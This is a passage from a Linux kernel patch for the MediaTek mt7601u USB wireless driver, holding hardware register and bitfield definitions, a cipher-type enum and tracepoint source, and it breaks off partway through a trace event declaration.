+#define MT_WLAN_FUN_CTRL_WLAN_RESET BIT(3) /* MT76x0 */ +#define MT_WLAN_FUN_CTRL_CSR_F20M_CKEN BIT(3) /* MT76x2 */ + +#define MT_WLAN_FUN_CTRL_PCIE_CLK_REQ BIT(4) +#define MT_WLAN_FUN_CTRL_FRC_WL_ANT_SEL BIT(5) +#define MT_WLAN_FUN_CTRL_INV_ANT_SEL BIT(6) +#define MT_WLAN_FUN_CTRL_WAKE_HOST BIT(7) + +#define MT_WLAN_FUN_CTRL_THERM_RST BIT(8) /* MT76x2 */ +#define MT_WLAN_FUN_CTRL_THERM_CKEN BIT(9) /* MT76x2 */ + +#define MT_WLAN_FUN_CTRL_GPIO_IN GENMASK(15, 8) /* MT76x0 */ +#define MT_WLAN_FUN_CTRL_GPIO_OUT GENMASK(23, 16) /* MT76x0 */ +#define MT_WLAN_FUN_CTRL_GPIO_OUT_EN GENMASK(31, 24) /* MT76x0 */ + +#define MT_XO_CTRL0 0x0100 +#define MT_XO_CTRL1 0x0104 +#define MT_XO_CTRL2 0x0108 +#define MT_XO_CTRL3 0x010c +#define MT_XO_CTRL4 0x0110 + +#define MT_XO_CTRL5 0x0114 +#define MT_XO_CTRL5_C2_VAL GENMASK(14, 8) + +#define MT_XO_CTRL6 0x0118 +#define MT_XO_CTRL6_C2_CTRL GENMASK(14, 8) + +#define MT_XO_CTRL7 0x011c + +#define MT_WLAN_MTC_CTRL 0x10148 +#define MT_WLAN_MTC_CTRL_MTCMOS_PWR_UP BIT(0) +#define MT_WLAN_MTC_CTRL_PWR_ACK BIT(12) +#define MT_WLAN_MTC_CTRL_PWR_ACK_S BIT(13) +#define MT_WLAN_MTC_CTRL_BBP_MEM_PD GENMASK(19, 16) +#define MT_WLAN_MTC_CTRL_PBF_MEM_PD BIT(20) +#define MT_WLAN_MTC_CTRL_FCE_MEM_PD BIT(21) +#define MT_WLAN_MTC_CTRL_TSO_MEM_PD BIT(22) +#define MT_WLAN_MTC_CTRL_BBP_MEM_RB BIT(24) +#define MT_WLAN_MTC_CTRL_PBF_MEM_RB BIT(25) +#define MT_WLAN_MTC_CTRL_FCE_MEM_RB BIT(26) +#define MT_WLAN_MTC_CTRL_TSO_MEM_RB BIT(27) +#define MT_WLAN_MTC_CTRL_STATE_UP BIT(28) + +#define MT_INT_SOURCE_CSR 0x0200 +#define MT_INT_MASK_CSR 0x0204 + +#define MT_INT_RX_DONE(_n) BIT(_n) +#define MT_INT_RX_DONE_ALL GENMASK(1, 0) +#define MT_INT_TX_DONE_ALL GENMASK(13, 4) +#define MT_INT_TX_DONE(_n) BIT(_n + 4) +#define MT_INT_RX_COHERENT BIT(16) +#define MT_INT_TX_COHERENT BIT(17) +#define MT_INT_ANY_COHERENT BIT(18) +#define MT_INT_MCU_CMD BIT(19) +#define MT_INT_TBTT BIT(20) +#define MT_INT_PRE_TBTT BIT(21) +#define MT_INT_TX_STAT BIT(22) +#define MT_INT_AUTO_WAKEUP BIT(23) +#define MT_INT_GPTIMER BIT(24) +#define MT_INT_RXDELAYINT BIT(26) +#define MT_INT_TXDELAYINT BIT(27) + +#define MT_WPDMA_GLO_CFG 0x0208 +#define MT_WPDMA_GLO_CFG_TX_DMA_EN BIT(0) +#define MT_WPDMA_GLO_CFG_TX_DMA_BUSY BIT(1) +#define MT_WPDMA_GLO_CFG_RX_DMA_EN BIT(2) +#define MT_WPDMA_GLO_CFG_RX_DMA_BUSY BIT(3) +#define MT_WPDMA_GLO_CFG_DMA_BURST_SIZE GENMASK(5, 4) +#define MT_WPDMA_GLO_CFG_TX_WRITEBACK_DONE BIT(6) +#define MT_WPDMA_GLO_CFG_BIG_ENDIAN BIT(7) +#define MT_WPDMA_GLO_CFG_HDR_SEG_LEN GENMASK(15, 8) 
+#define MT_WPDMA_GLO_CFG_CLK_GATE_DIS BIT(30) +#define MT_WPDMA_GLO_CFG_RX_2B_OFFSET BIT(31) + +#define MT_WPDMA_RST_IDX 0x020c + +#define MT_WPDMA_DELAY_INT_CFG 0x0210 + +#define MT_WMM_AIFSN 0x0214 +#define MT_WMM_AIFSN_MASK GENMASK(3, 0) +#define MT_WMM_AIFSN_SHIFT(_n) ((_n) * 4) + +#define MT_WMM_CWMIN 0x0218 +#define MT_WMM_CWMIN_MASK GENMASK(3, 0) +#define MT_WMM_CWMIN_SHIFT(_n) ((_n) * 4) + +#define MT_WMM_CWMAX 0x021c +#define MT_WMM_CWMAX_MASK GENMASK(3, 0) +#define MT_WMM_CWMAX_SHIFT(_n) ((_n) * 4) + +#define MT_WMM_TXOP_BASE 0x0220 +#define MT_WMM_TXOP(_n) (MT_WMM_TXOP_BASE + (((_n) / 2) << 2)) +#define MT_WMM_TXOP_SHIFT(_n) ((_n & 1) * 16) +#define MT_WMM_TXOP_MASK GENMASK(15, 0) + +#define MT_FCE_DMA_ADDR 0x0230 +#define MT_FCE_DMA_LEN 0x0234 + +#define MT_USB_DMA_CFG 0x238 +#define MT_USB_DMA_CFG_RX_BULK_AGG_TOUT GENMASK(7, 0) +#define MT_USB_DMA_CFG_RX_BULK_AGG_LMT GENMASK(15, 8) +#define MT_USB_DMA_CFG_PHY_CLR BIT(16) +#define MT_USB_DMA_CFG_TX_CLR BIT(19) +#define MT_USB_DMA_CFG_TXOP_HALT BIT(20) +#define MT_USB_DMA_CFG_RX_BULK_AGG_EN BIT(21) +#define MT_USB_DMA_CFG_RX_BULK_EN BIT(22) +#define MT_USB_DMA_CFG_TX_BULK_EN BIT(23) +#define MT_USB_DMA_CFG_UDMA_RX_WL_DROP BIT(25) +#define MT_USB_DMA_CFG_EP_OUT_VALID GENMASK(29, 27) +#define MT_USB_DMA_CFG_RX_BUSY BIT(30) +#define MT_USB_DMA_CFG_TX_BUSY BIT(31) + +#define MT_TSO_CTRL 0x0250 +#define MT_HEADER_TRANS_CTRL_REG 0x0260 + +#define MT_US_CYC_CFG 0x02a4 +#define MT_US_CYC_CNT GENMASK(7, 0) + +#define MT_TX_RING_BASE 0x0300 +#define MT_RX_RING_BASE 0x03c0 +#define MT_RING_SIZE 0x10 + +#define MT_TX_HW_QUEUE_MCU 8 +#define MT_TX_HW_QUEUE_MGMT 9 + +#define MT_PBF_SYS_CTRL 0x0400 +#define MT_PBF_SYS_CTRL_MCU_RESET BIT(0) +#define MT_PBF_SYS_CTRL_DMA_RESET BIT(1) +#define MT_PBF_SYS_CTRL_MAC_RESET BIT(2) +#define MT_PBF_SYS_CTRL_PBF_RESET BIT(3) +#define MT_PBF_SYS_CTRL_ASY_RESET BIT(4) + +#define MT_PBF_CFG 0x0404 +#define MT_PBF_CFG_TX0Q_EN BIT(0) +#define MT_PBF_CFG_TX1Q_EN BIT(1) +#define MT_PBF_CFG_TX2Q_EN BIT(2) +#define MT_PBF_CFG_TX3Q_EN BIT(3) +#define MT_PBF_CFG_RX0Q_EN BIT(4) +#define MT_PBF_CFG_RX_DROP_EN BIT(8) + +#define MT_PBF_TX_MAX_PCNT 0x0408 +#define MT_PBF_RX_MAX_PCNT 0x040c + +#define MT_BCN_OFFSET_BASE 0x041c +#define MT_BCN_OFFSET(_n) (MT_BCN_OFFSET_BASE + ((_n) << 2)) + +#define MT_RF_CSR_CFG 0x0500 +#define MT_RF_CSR_CFG_DATA GENMASK(7, 0) +#define MT_RF_CSR_CFG_REG_ID GENMASK(13, 8) +#define MT_RF_CSR_CFG_REG_BANK GENMASK(17, 14) +#define MT_RF_CSR_CFG_WR BIT(30) +#define MT_RF_CSR_CFG_KICK BIT(31) + +#define MT_RF_BYPASS_0 0x0504 +#define MT_RF_BYPASS_1 0x0508 +#define MT_RF_SETTING_0 0x050c + +#define MT_RF_DATA_WRITE 0x0524 + +#define MT_RF_CTRL 0x0528 +#define MT_RF_CTRL_ADDR GENMASK(11, 0) +#define MT_RF_CTRL_WRITE BIT(12) +#define MT_RF_CTRL_BUSY BIT(13) +#define MT_RF_CTRL_IDX BIT(16) + +#define MT_RF_DATA_READ 0x052c + +#define MT_FCE_PSE_CTRL 0x0800 +#define MT_FCE_PARAMETERS 0x0804 +#define MT_FCE_CSO 0x0808 + +#define MT_FCE_L2_STUFF 0x080c +#define MT_FCE_L2_STUFF_HT_L2_EN BIT(0) +#define MT_FCE_L2_STUFF_QOS_L2_EN BIT(1) +#define MT_FCE_L2_STUFF_RX_STUFF_EN BIT(2) +#define MT_FCE_L2_STUFF_TX_STUFF_EN BIT(3) +#define MT_FCE_L2_STUFF_WR_MPDU_LEN_EN BIT(4) +#define MT_FCE_L2_STUFF_MVINV_BSWAP BIT(5) +#define MT_FCE_L2_STUFF_TS_CMD_QSEL_EN GENMASK(15, 8) +#define MT_FCE_L2_STUFF_TS_LEN_EN GENMASK(23, 16) +#define MT_FCE_L2_STUFF_OTHER_PORT GENMASK(25, 24) + +#define MT_FCE_WLAN_FLOW_CONTROL1 0x0824 + +#define MT_TX_CPU_FROM_FCE_BASE_PTR 0x09a0 +#define MT_TX_CPU_FROM_FCE_MAX_COUNT 0x09a4 
+#define MT_TX_CPU_FROM_FCE_CPU_DESC_IDX 0x09a8 + +#define MT_FCE_PDMA_GLOBAL_CONF 0x09c4 + +#define MT_PAUSE_ENABLE_CONTROL1 0x0a38 + +#define MT_FCE_SKIP_FS 0x0a6c + +#define MT_MAC_CSR0 0x1000 + +#define MT_MAC_SYS_CTRL 0x1004 +#define MT_MAC_SYS_CTRL_RESET_CSR BIT(0) +#define MT_MAC_SYS_CTRL_RESET_BBP BIT(1) +#define MT_MAC_SYS_CTRL_ENABLE_TX BIT(2) +#define MT_MAC_SYS_CTRL_ENABLE_RX BIT(3) + +#define MT_MAC_ADDR_DW0 0x1008 +#define MT_MAC_ADDR_DW1 0x100c +#define MT_MAC_ADDR_DW1_U2ME_MASK GENMASK(23, 16) + +#define MT_MAC_BSSID_DW0 0x1010 +#define MT_MAC_BSSID_DW1 0x1014 +#define MT_MAC_BSSID_DW1_ADDR GENMASK(15, 0) +#define MT_MAC_BSSID_DW1_MBSS_MODE GENMASK(17, 16) +#define MT_MAC_BSSID_DW1_MBEACON_N GENMASK(20, 18) +#define MT_MAC_BSSID_DW1_MBSS_LOCAL_BIT BIT(21) +#define MT_MAC_BSSID_DW1_MBSS_MODE_B2 BIT(22) +#define MT_MAC_BSSID_DW1_MBEACON_N_B3 BIT(23) +#define MT_MAC_BSSID_DW1_MBSS_IDX_BYTE GENMASK(26, 24) + +#define MT_MAX_LEN_CFG 0x1018 +#define MT_MAX_LEN_CFG_AMPDU GENMASK(13, 12) + +#define MT_BBP_CSR_CFG 0x101c +#define MT_BBP_CSR_CFG_VAL GENMASK(7, 0) +#define MT_BBP_CSR_CFG_REG_NUM GENMASK(15, 8) +#define MT_BBP_CSR_CFG_READ BIT(16) +#define MT_BBP_CSR_CFG_BUSY BIT(17) +#define MT_BBP_CSR_CFG_PAR_DUR BIT(18) +#define MT_BBP_CSR_CFG_RW_MODE BIT(19) + +#define MT_AMPDU_MAX_LEN_20M1S 0x1030 +#define MT_AMPDU_MAX_LEN_20M2S 0x1034 +#define MT_AMPDU_MAX_LEN_40M1S 0x1038 +#define MT_AMPDU_MAX_LEN_40M2S 0x103c +#define MT_AMPDU_MAX_LEN 0x1040 + +#define MT_WCID_DROP_BASE 0x106c +#define MT_WCID_DROP(_n) (MT_WCID_DROP_BASE + ((_n) >> 5) * 4) +#define MT_WCID_DROP_MASK(_n) BIT((_n) % 32) + +#define MT_BCN_BYPASS_MASK 0x108c + +#define MT_MAC_APC_BSSID_BASE 0x1090 +#define MT_MAC_APC_BSSID_L(_n) (MT_MAC_APC_BSSID_BASE + ((_n) * 8)) +#define MT_MAC_APC_BSSID_H(_n) (MT_MAC_APC_BSSID_BASE + ((_n) * 8 + 4)) +#define MT_MAC_APC_BSSID_H_ADDR GENMASK(15, 0) +#define MT_MAC_APC_BSSID0_H_EN BIT(16) + +#define MT_XIFS_TIME_CFG 0x1100 +#define MT_XIFS_TIME_CFG_CCK_SIFS GENMASK(7, 0) +#define MT_XIFS_TIME_CFG_OFDM_SIFS GENMASK(15, 8) +#define MT_XIFS_TIME_CFG_OFDM_XIFS GENMASK(19, 16) +#define MT_XIFS_TIME_CFG_EIFS GENMASK(28, 20) +#define MT_XIFS_TIME_CFG_BB_RXEND_EN BIT(29) + +#define MT_BKOFF_SLOT_CFG 0x1104 +#define MT_BKOFF_SLOT_CFG_SLOTTIME GENMASK(7, 0) +#define MT_BKOFF_SLOT_CFG_CC_DELAY GENMASK(11, 8) + +#define MT_BEACON_TIME_CFG 0x1114 +#define MT_BEACON_TIME_CFG_INTVAL GENMASK(15, 0) +#define MT_BEACON_TIME_CFG_TIMER_EN BIT(16) +#define MT_BEACON_TIME_CFG_SYNC_MODE GENMASK(18, 17) +#define MT_BEACON_TIME_CFG_TBTT_EN BIT(19) +#define MT_BEACON_TIME_CFG_BEACON_TX BIT(20) +#define MT_BEACON_TIME_CFG_TSF_COMP GENMASK(31, 24) + +#define MT_TBTT_SYNC_CFG 0x1118 +#define MT_TBTT_TIMER_CFG 0x1124 + +#define MT_INT_TIMER_CFG 0x1128 +#define MT_INT_TIMER_CFG_PRE_TBTT GENMASK(15, 0) +#define MT_INT_TIMER_CFG_GP_TIMER GENMASK(31, 16) + +#define MT_INT_TIMER_EN 0x112c +#define MT_INT_TIMER_EN_PRE_TBTT_EN BIT(0) +#define MT_INT_TIMER_EN_GP_TIMER_EN BIT(1) + +#define MT_MAC_STATUS 0x1200 +#define MT_MAC_STATUS_TX BIT(0) +#define MT_MAC_STATUS_RX BIT(1) + +#define MT_PWR_PIN_CFG 0x1204 +#define MT_AUX_CLK_CFG 0x120c + +#define MT_BB_PA_MODE_CFG0 0x1214 +#define MT_BB_PA_MODE_CFG1 0x1218 +#define MT_RF_PA_MODE_CFG0 0x121c +#define MT_RF_PA_MODE_CFG1 0x1220 + +#define MT_RF_PA_MODE_ADJ0 0x1228 +#define MT_RF_PA_MODE_ADJ1 0x122c + +#define MT_DACCLK_EN_DLY_CFG 0x1264 + +#define MT_EDCA_CFG_BASE 0x1300 +#define MT_EDCA_CFG_AC(_n) (MT_EDCA_CFG_BASE + ((_n) << 2)) +#define MT_EDCA_CFG_TXOP GENMASK(7, 0) 
+#define MT_EDCA_CFG_AIFSN GENMASK(11, 8) +#define MT_EDCA_CFG_CWMIN GENMASK(15, 12) +#define MT_EDCA_CFG_CWMAX GENMASK(19, 16) + +#define MT_TX_PWR_CFG_0 0x1314 +#define MT_TX_PWR_CFG_1 0x1318 +#define MT_TX_PWR_CFG_2 0x131c +#define MT_TX_PWR_CFG_3 0x1320 +#define MT_TX_PWR_CFG_4 0x1324 + +#define MT_TX_BAND_CFG 0x132c +#define MT_TX_BAND_CFG_UPPER_40M BIT(0) +#define MT_TX_BAND_CFG_5G BIT(1) +#define MT_TX_BAND_CFG_2G BIT(2) + +#define MT_HT_FBK_TO_LEGACY 0x1384 +#define MT_TX_MPDU_ADJ_INT 0x1388 + +#define MT_TX_PWR_CFG_7 0x13d4 +#define MT_TX_PWR_CFG_8 0x13d8 +#define MT_TX_PWR_CFG_9 0x13dc + +#define MT_TX_SW_CFG0 0x1330 +#define MT_TX_SW_CFG1 0x1334 +#define MT_TX_SW_CFG2 0x1338 + +#define MT_TXOP_CTRL_CFG 0x1340 +#define MT_TXOP_TRUN_EN GENMASK(5, 0) +#define MT_TXOP_EXT_CCA_DLY GENMASK(15, 8) +#define MT_TXOP_CTRL + +#define MT_TX_RTS_CFG 0x1344 +#define MT_TX_RTS_CFG_RETRY_LIMIT GENMASK(7, 0) +#define MT_TX_RTS_CFG_THRESH GENMASK(23, 8) +#define MT_TX_RTS_FALLBACK BIT(24) + +#define MT_TX_TIMEOUT_CFG 0x1348 +#define MT_TX_RETRY_CFG 0x134c +#define MT_TX_LINK_CFG 0x1350 +#define MT_HT_FBK_CFG0 0x1354 +#define MT_HT_FBK_CFG1 0x1358 +#define MT_LG_FBK_CFG0 0x135c +#define MT_LG_FBK_CFG1 0x1360 + +#define MT_CCK_PROT_CFG 0x1364 +#define MT_OFDM_PROT_CFG 0x1368 +#define MT_MM20_PROT_CFG 0x136c +#define MT_MM40_PROT_CFG 0x1370 +#define MT_GF20_PROT_CFG 0x1374 +#define MT_GF40_PROT_CFG 0x1378 + +#define MT_PROT_RATE GENMASK(15, 0) +#define MT_PROT_CTRL_RTS_CTS BIT(16) +#define MT_PROT_CTRL_CTS2SELF BIT(17) +#define MT_PROT_NAV_SHORT BIT(18) +#define MT_PROT_NAV_LONG BIT(19) +#define MT_PROT_TXOP_ALLOW_CCK BIT(20) +#define MT_PROT_TXOP_ALLOW_OFDM BIT(21) +#define MT_PROT_TXOP_ALLOW_MM20 BIT(22) +#define MT_PROT_TXOP_ALLOW_MM40 BIT(23) +#define MT_PROT_TXOP_ALLOW_GF20 BIT(24) +#define MT_PROT_TXOP_ALLOW_GF40 BIT(25) +#define MT_PROT_RTS_THR_EN BIT(26) +#define MT_PROT_RATE_CCK_11 0x0003 +#define MT_PROT_RATE_OFDM_6 0x4000 +#define MT_PROT_RATE_OFDM_24 0x4004 +#define MT_PROT_RATE_DUP_OFDM_24 0x4084 +#define MT_PROT_TXOP_ALLOW_ALL GENMASK(25, 20) +#define MT_PROT_TXOP_ALLOW_BW20 (MT_PROT_TXOP_ALLOW_ALL & \ + ~MT_PROT_TXOP_ALLOW_MM40 & \ + ~MT_PROT_TXOP_ALLOW_GF40) + +#define MT_EXP_ACK_TIME 0x1380 + +#define MT_TX_PWR_CFG_0_EXT 0x1390 +#define MT_TX_PWR_CFG_1_EXT 0x1394 + +#define MT_TX_FBK_LIMIT 0x1398 +#define MT_TX_FBK_LIMIT_MPDU_FBK GENMASK(7, 0) +#define MT_TX_FBK_LIMIT_AMPDU_FBK GENMASK(15, 8) +#define MT_TX_FBK_LIMIT_MPDU_UP_CLEAR BIT(16) +#define MT_TX_FBK_LIMIT_AMPDU_UP_CLEAR BIT(17) +#define MT_TX_FBK_LIMIT_RATE_LUT BIT(18) + +#define MT_TX0_RF_GAIN_CORR 0x13a0 +#define MT_TX1_RF_GAIN_CORR 0x13a4 +#define MT_TX0_RF_GAIN_ATTEN 0x13a8 + +#define MT_TX_ALC_CFG_0 0x13b0 +#define MT_TX_ALC_CFG_0_CH_INIT_0 GENMASK(5, 0) +#define MT_TX_ALC_CFG_0_CH_INIT_1 GENMASK(13, 8) +#define MT_TX_ALC_CFG_0_LIMIT_0 GENMASK(21, 16) +#define MT_TX_ALC_CFG_0_LIMIT_1 GENMASK(29, 24) + +#define MT_TX_ALC_CFG_1 0x13b4 +#define MT_TX_ALC_CFG_1_TEMP_COMP GENMASK(5, 0) + +#define MT_TX_ALC_CFG_2 0x13a8 +#define MT_TX_ALC_CFG_2_TEMP_COMP GENMASK(5, 0) + +#define MT_TX0_BB_GAIN_ATTEN 0x13c0 + +#define MT_TX_ALC_VGA3 0x13c8 + +#define MT_TX_PROT_CFG6 0x13e0 +#define MT_TX_PROT_CFG7 0x13e4 +#define MT_TX_PROT_CFG8 0x13e8 + +#define MT_PIFS_TX_CFG 0x13ec + +#define MT_RX_FILTR_CFG 0x1400 + +#define MT_RX_FILTR_CFG_CRC_ERR BIT(0) +#define MT_RX_FILTR_CFG_PHY_ERR BIT(1) +#define MT_RX_FILTR_CFG_PROMISC BIT(2) +#define MT_RX_FILTR_CFG_OTHER_BSS BIT(3) +#define MT_RX_FILTR_CFG_VER_ERR BIT(4) +#define 
MT_RX_FILTR_CFG_MCAST BIT(5) +#define MT_RX_FILTR_CFG_BCAST BIT(6) +#define MT_RX_FILTR_CFG_DUP BIT(7) +#define MT_RX_FILTR_CFG_CFACK BIT(8) +#define MT_RX_FILTR_CFG_CFEND BIT(9) +#define MT_RX_FILTR_CFG_ACK BIT(10) +#define MT_RX_FILTR_CFG_CTS BIT(11) +#define MT_RX_FILTR_CFG_RTS BIT(12) +#define MT_RX_FILTR_CFG_PSPOLL BIT(13) +#define MT_RX_FILTR_CFG_BA BIT(14) +#define MT_RX_FILTR_CFG_BAR BIT(15) +#define MT_RX_FILTR_CFG_CTRL_RSV BIT(16) + +#define MT_AUTO_RSP_CFG 0x1404 + +#define MT_AUTO_RSP_PREAMB_SHORT BIT(4) + +#define MT_LEGACY_BASIC_RATE 0x1408 +#define MT_HT_BASIC_RATE 0x140c + +#define MT_RX_PARSER_CFG 0x1418 +#define MT_RX_PARSER_RX_SET_NAV_ALL BIT(0) + +#define MT_EXT_CCA_CFG 0x141c +#define MT_EXT_CCA_CFG_CCA0 GENMASK(1, 0) +#define MT_EXT_CCA_CFG_CCA1 GENMASK(3, 2) +#define MT_EXT_CCA_CFG_CCA2 GENMASK(5, 4) +#define MT_EXT_CCA_CFG_CCA3 GENMASK(7, 6) +#define MT_EXT_CCA_CFG_CCA_MASK GENMASK(11, 8) +#define MT_EXT_CCA_CFG_ED_CCA_MASK GENMASK(15, 12) + +#define MT_TX_SW_CFG3 0x1478 + +#define MT_PN_PAD_MODE 0x150c + +#define MT_TXOP_HLDR_ET 0x1608 + +#define MT_PROT_AUTO_TX_CFG 0x1648 + +#define MT_RX_STA_CNT0 0x1700 +#define MT_RX_STA_CNT1 0x1704 +#define MT_RX_STA_CNT2 0x1708 +#define MT_TX_STA_CNT0 0x170c +#define MT_TX_STA_CNT1 0x1710 +#define MT_TX_STA_CNT2 0x1714 + +/* Vendor driver defines content of the second word of STAT_FIFO as follows: + * MT_TX_STAT_FIFO_RATE GENMASK(26, 16) + * MT_TX_STAT_FIFO_ETXBF BIT(27) + * MT_TX_STAT_FIFO_SND BIT(28) + * MT_TX_STAT_FIFO_ITXBF BIT(29) + * However, tests show that b16-31 have the same layout as TXWI rate_ctl + * with rate set to rate at which frame was acked. + */ +#define MT_TX_STAT_FIFO 0x1718 +#define MT_TX_STAT_FIFO_VALID BIT(0) +#define MT_TX_STAT_FIFO_PID_TYPE GENMASK(4, 1) +#define MT_TX_STAT_FIFO_SUCCESS BIT(5) +#define MT_TX_STAT_FIFO_AGGR BIT(6) +#define MT_TX_STAT_FIFO_ACKREQ BIT(7) +#define MT_TX_STAT_FIFO_WCID GENMASK(15, 8) +#define MT_TX_STAT_FIFO_RATE GENMASK(31, 16) + +#define MT_TX_AGG_STAT 0x171c + +#define MT_TX_AGG_CNT_BASE0 0x1720 + +#define MT_MPDU_DENSITY_CNT 0x1740 + +#define MT_TX_AGG_CNT_BASE1 0x174c + +#define MT_TX_AGG_CNT(_id) ((_id) < 8 ? 
\ + MT_TX_AGG_CNT_BASE0 + ((_id) << 2) : \ + MT_TX_AGG_CNT_BASE1 + ((_id - 8) << 2)) + +#define MT_TX_STAT_FIFO_EXT 0x1798 +#define MT_TX_STAT_FIFO_EXT_RETRY GENMASK(7, 0) + +#define MT_BBP_CORE_BASE 0x2000 +#define MT_BBP_IBI_BASE 0x2100 +#define MT_BBP_AGC_BASE 0x2300 +#define MT_BBP_TXC_BASE 0x2400 +#define MT_BBP_RXC_BASE 0x2500 +#define MT_BBP_TXO_BASE 0x2600 +#define MT_BBP_TXBE_BASE 0x2700 +#define MT_BBP_RXFE_BASE 0x2800 +#define MT_BBP_RXO_BASE 0x2900 +#define MT_BBP_DFS_BASE 0x2a00 +#define MT_BBP_TR_BASE 0x2b00 +#define MT_BBP_CAL_BASE 0x2c00 +#define MT_BBP_DSC_BASE 0x2e00 +#define MT_BBP_PFMU_BASE 0x2f00 + +#define MT_BBP(_type, _n) (MT_BBP_##_type##_BASE + ((_n) << 2)) + +#define MT_BBP_CORE_R1_BW GENMASK(4, 3) + +#define MT_BBP_AGC_R0_CTRL_CHAN GENMASK(9, 8) +#define MT_BBP_AGC_R0_BW GENMASK(14, 12) + +/* AGC, R4/R5 */ +#define MT_BBP_AGC_LNA_GAIN GENMASK(21, 16) + +/* AGC, R8/R9 */ +#define MT_BBP_AGC_GAIN GENMASK(14, 8) + +#define MT_BBP_AGC20_RSSI0 GENMASK(7, 0) +#define MT_BBP_AGC20_RSSI1 GENMASK(15, 8) + +#define MT_BBP_TXBE_R0_CTRL_CHAN GENMASK(1, 0) + +#define MT_WCID_ADDR_BASE 0x1800 +#define MT_WCID_ADDR(_n) (MT_WCID_ADDR_BASE + (_n) * 8) + +#define MT_SRAM_BASE 0x4000 + +#define MT_WCID_KEY_BASE 0x8000 +#define MT_WCID_KEY(_n) (MT_WCID_KEY_BASE + (_n) * 32) + +#define MT_WCID_IV_BASE 0xa000 +#define MT_WCID_IV(_n) (MT_WCID_IV_BASE + (_n) * 8) + +#define MT_WCID_ATTR_BASE 0xa800 +#define MT_WCID_ATTR(_n) (MT_WCID_ATTR_BASE + (_n) * 4) + +#define MT_WCID_ATTR_PAIRWISE BIT(0) +#define MT_WCID_ATTR_PKEY_MODE GENMASK(3, 1) +#define MT_WCID_ATTR_BSS_IDX GENMASK(6, 4) +#define MT_WCID_ATTR_RXWI_UDF GENMASK(9, 7) +#define MT_WCID_ATTR_PKEY_MODE_EXT BIT(10) +#define MT_WCID_ATTR_BSS_IDX_EXT BIT(11) +#define MT_WCID_ATTR_WAPI_MCBC BIT(15) +#define MT_WCID_ATTR_WAPI_KEYID GENMASK(31, 24) + +#define MT_SKEY_BASE_0 0xac00 +#define MT_SKEY_BASE_1 0xb400 +#define MT_SKEY_0(_bss, _idx) \ + (MT_SKEY_BASE_0 + (4 * (_bss) + _idx) * 32) +#define MT_SKEY_1(_bss, _idx) \ + (MT_SKEY_BASE_1 + (4 * ((_bss) & 7) + _idx) * 32) +#define MT_SKEY(_bss, _idx) \ + ((_bss & 8) ? MT_SKEY_1(_bss, _idx) : MT_SKEY_0(_bss, _idx)) + +#define MT_SKEY_MODE_BASE_0 0xb000 +#define MT_SKEY_MODE_BASE_1 0xb3f0 +#define MT_SKEY_MODE_0(_bss) \ + (MT_SKEY_MODE_BASE_0 + ((_bss / 2) << 2)) +#define MT_SKEY_MODE_1(_bss) \ + (MT_SKEY_MODE_BASE_1 + ((((_bss) & 7) / 2) << 2)) +#define MT_SKEY_MODE(_bss) \ + ((_bss & 8) ? 
MT_SKEY_MODE_1(_bss) : MT_SKEY_MODE_0(_bss)) +#define MT_SKEY_MODE_MASK GENMASK(3, 0) +#define MT_SKEY_MODE_SHIFT(_bss, _idx) (4 * ((_idx) + 4 * (_bss & 1))) + +#define MT_BEACON_BASE 0xc000 + +#define MT_TEMP_SENSOR 0x1d000 +#define MT_TEMP_SENSOR_VAL GENMASK(6, 0) + +enum mt76_cipher_type { + MT_CIPHER_NONE, + MT_CIPHER_WEP40, + MT_CIPHER_WEP104, + MT_CIPHER_TKIP, + MT_CIPHER_AES_CCMP, + MT_CIPHER_CKIP40, + MT_CIPHER_CKIP104, + MT_CIPHER_CKIP128, + MT_CIPHER_WAPI, +}; + +#endif diff --git a/drivers/net/wireless/mediatek/mt7601u/trace.c b/drivers/net/wireless/mediatek/mt7601u/trace.c new file mode 100644 index 000000000000..8abdd3cd546d --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/trace.c @@ -0,0 +1,21 @@ +/* + * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#include + +#ifndef __CHECKER__ +#define CREATE_TRACE_POINTS +#include "trace.h" + +#endif diff --git a/drivers/net/wireless/mediatek/mt7601u/trace.h b/drivers/net/wireless/mediatek/mt7601u/trace.h new file mode 100644 index 000000000000..289897300ef0 --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/trace.h @@ -0,0 +1,400 @@ +/* + * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. 
+ */ + +#if !defined(__MT7601U_TRACE_H) || defined(TRACE_HEADER_MULTI_READ) +#define __MT7601U_TRACE_H + +#include +#include "mt7601u.h" +#include "mac.h" + +#undef TRACE_SYSTEM +#define TRACE_SYSTEM mt7601u + +#define MAXNAME 32 +#define DEV_ENTRY __array(char, wiphy_name, 32) +#define DEV_ASSIGN strlcpy(__entry->wiphy_name, \ + wiphy_name(dev->hw->wiphy), MAXNAME) +#define DEV_PR_FMT "%s " +#define DEV_PR_ARG __entry->wiphy_name + +#define REG_ENTRY __field(u32, reg) __field(u32, val) +#define REG_ASSIGN __entry->reg = reg; __entry->val = val +#define REG_PR_FMT "%04x=%08x" +#define REG_PR_ARG __entry->reg, __entry->val + +DECLARE_EVENT_CLASS(dev_reg_evt, + TP_PROTO(struct mt7601u_dev *dev, u32 reg, u32 val), + TP_ARGS(dev, reg, val), + TP_STRUCT__entry( + DEV_ENTRY + REG_ENTRY + ), + TP_fast_assign( + DEV_ASSIGN; + REG_ASSIGN; + ), + TP_printk( + DEV_PR_FMT REG_PR_FMT, + DEV_PR_ARG, REG_PR_ARG + ) +); + +DEFINE_EVENT(dev_reg_evt, reg_read, + TP_PROTO(struct mt7601u_dev *dev, u32 reg, u32 val), + TP_ARGS(dev, reg, val) +); + +DEFINE_EVENT(dev_reg_evt, reg_write, + TP_PROTO(struct mt7601u_dev *dev, u32 reg, u32 val), + TP_ARGS(dev, reg, val) +); + +TRACE_EVENT(mt_submit_urb, + TP_PROTO(struct mt7601u_dev *dev, struct urb 